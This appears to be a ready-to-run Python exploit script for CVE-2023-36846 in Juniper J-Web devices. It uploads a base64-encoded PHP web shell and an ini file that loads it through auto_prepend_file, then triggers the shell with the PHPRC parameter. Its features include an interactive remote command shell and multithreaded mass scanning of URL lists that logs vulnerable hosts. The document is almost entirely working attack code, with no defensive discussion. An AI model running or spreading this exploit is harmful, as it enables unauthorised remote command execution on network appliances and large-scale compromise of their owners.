README.md
Rendering markdown...
import re
import os
import base64
import urllib3
import argparse
import requests
import concurrent.futures
from threading import Lock
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BalgoExploit:
def __init__(self, url, output):
self.url = url
self.console = Console()
self.output = output
self.verbose = bool(self.output)
def upload_php(self, php_payload):
php_payload_bytes = php_payload.encode('ascii')
php_payload_base64 = base64.b64encode(php_payload_bytes).decode('ascii')
upload_request_url = f"{self.url}/webauth_operation.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {
"rs": "do_upload",
"rsargs[0]": f"[{{\"fileData\":\"data:text/html;base64,{php_payload_base64}\",\"fileName\":\"watchTowr.php\",\"csize\":{len(php_payload)}}}]"
}
response = requests.post(upload_request_url, headers=headers, data=data, verify=False, timeout=5)
uploaded_file = re.findall("0\: '(.*?)'\},", response.text)
if not uploaded_file and not self.verbose:
self.console.print(f"[bold red][-] Failed to upload php file for {self.url}[/bold red]")
return None
return str(uploaded_file[0])
def upload_ini(self, php_path):
ini_payload = f'auto_prepend_file="/var/tmp/{php_path}"'
ini_payload_bytes = ini_payload.encode('ascii')
ini_payload_b64 = base64.b64encode(ini_payload_bytes).decode('ascii')
ini_request_url = f"{self.url}/webauth_operation.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {
"rs": "do_upload",
"rsargs[0]": f"[{{\"fileData\":\"data:plain/text;base64,{ini_payload_b64}\",\"fileName\":\"watchTowr.ini\",\"csize\":{len(ini_payload)}}}]"
}
response = requests.post(ini_request_url, headers=headers, data=data, verify=False, timeout=5)
uploaded_ini = re.findall("0\: '(.*?)'\},", response.text)
if not uploaded_ini and not self.verbose:
self.console.print(f"[bold red][-] Failed to upload ini file for {self.url}[/bold red]")
return None
return uploaded_ini[0]
def execute_webshell(self, ini_file, cmd):
exec_url = f"{self.url}/webauth_operation.php?PHPRC=/var/tmp/{ini_file}&0={cmd}"
response = requests.get(exec_url, verify=False, timeout=5)
matches = re.findall("\[S\](.*?)\[E\]", response.text, re.DOTALL)
return matches[0].strip() if matches else None
def run(self, cmd, delete=None):
php_payload = f"<?php if(isset($_GET['delete'])) {{ @unlink(__FILE__); }} else {{ echo '[S]'; system($_GET['0']); echo '[E]'; }} ?>"
php_path = self.upload_php(php_payload)
ini_file = self.upload_ini(php_path)
if any(value is None for value in [php_path, ini_file]):
return None
result = self.execute_webshell(ini_file, cmd)
if result and self.output:
with open(self.output, "a") as f:
f.write(self.url + "\n")
if delete:
self.execute_webshell(ini_file, f"delete=1")
return result
class JunosShell:
def __init__(self, exploit):
self.exploit = exploit
self.console = Console()
def interactive_shell(self, ini_file):
self.console.print("\n[bold magenta][*] Entering JunOS interactive shell mode...[/bold magenta]")
session = PromptSession(history=InMemoryHistory())
while True:
try:
command = session.prompt(HTML('<ansired><b>juniper# </b></ansired>'))
if command.lower() in ["exit", "quit"]:
self.exploit.execute_webshell(ini_file, f"delete=1")
self.console.print("[bold yellow][!] Exiting JunOS shell and cleaning up...[/bold yellow]")
break
elif "clear" in command:
os.system('clear') if os.name == 'posix' else os.system('cls')
else:
result = self.exploit.execute_webshell(ini_file, command)
self.console.print(f"[bold green][-] Execution Results:[/bold green]\n[bold yellow]{result}[/bold yellow]")
except KeyboardInterrupt:
self.exploit.execute_webshell(ini_file, f"delete=1")
self.console.print("[bold yellow][!] Exiting JunOS shell and cleaning up...[/bold yellow]")
break
def check_vulnerability(url, output=None):
exploit = BalgoExploit(url, output)
try:
response = exploit.run("echo Vulnerable", delete=True)
if response is None:
if not exploit.verbose:
exploit.console.print(f"[bold red][X] {url} does not seem to be vulnerable![/bold red]")
return False
exploit.console.print(
f"[bold red][+] {url} is vulnerable to CVE-2023-36846[/bold red]\n"
f"[bold green][-] Extracted Output:[/bold green] "
f"[bold yellow]{response}[/bold yellow]"
)
if output:
with open(output, "a") as f:
f.write(url + "\n")
return True
except:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--threads", type=int, default=50, help="Number of threads for concurrent scanning")
parser.add_argument("-o", "--output", help="Output file")
parser.add_argument("-f", "--file", help="Input file containing list of URLs")
parser.add_argument("-u", "--url", help="Target url in the format https://localhost")
args = parser.parse_args()
if args.url:
is_vulnerable = check_vulnerability(args.url, args.output)
if is_vulnerable:
exploit = BalgoExploit(args.url, args.output)
php_payload = f"<?php if(isset($_GET['delete'])) {{ @unlink(__FILE__); }} else {{ echo '[S]'; system($_GET['0']); echo '[E]'; }} ?>"
php_path = exploit.upload_php(php_payload)
ini_file = exploit.upload_ini(php_path)
junos_shell = JunosShell(exploit)
junos_shell.interactive_shell(ini_file)
elif args.file:
with open(args.file, "r") as f:
urls = [url.strip() for url in f.readlines()]
bar_lock = Lock()
def safe_check_vulnerability(url, output):
check_vulnerability(url, output)
with bar_lock:
bar()
with alive_bar(len(urls), title="Processing URLs") as bar:
with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
executor.map(safe_check_vulnerability, urls, [args.output] * len(urls))
if __name__ == "__main__":
main()